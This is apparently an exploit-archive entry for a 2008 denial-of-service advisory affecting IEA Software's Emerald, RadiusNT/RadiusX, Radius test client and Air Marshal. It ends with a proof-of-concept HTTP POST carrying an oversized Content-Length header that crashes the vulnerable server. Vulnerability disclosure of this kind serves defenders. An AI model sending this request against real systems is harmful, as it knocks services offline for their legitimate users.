IEA Software (Multiple Products) - POST Denial of Service

Author: Luigi Auriemma
type: dos
platform: multiple
port: 
date_added: 2008-02-08  
date_updated: 2017-07-11  
verified: 1  
codes: CVE-2008-5284;OSVDB-42905  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 31128.txt  

source: https://www.securityfocus.com/bid/27701/info

Multiple IEA Software products are prone to a denial-of-service vulnerability.

Successfully exploiting this issue will allow attackers to crash the affected application, denying service to legitimate users.

This issue affects the following applications:

- Emerald 5.0.49 and prior versions
- RadiusNT and RadiusX 5.1.38 and prior versions
- Radius test client 4.0.20 and prior versions
- Air Marshal 2.0.4 and prior versions

The following proof-of-concept exploit code is available:

POST / HTTP/1.0
Host: localhost
Content-Length: 2147483647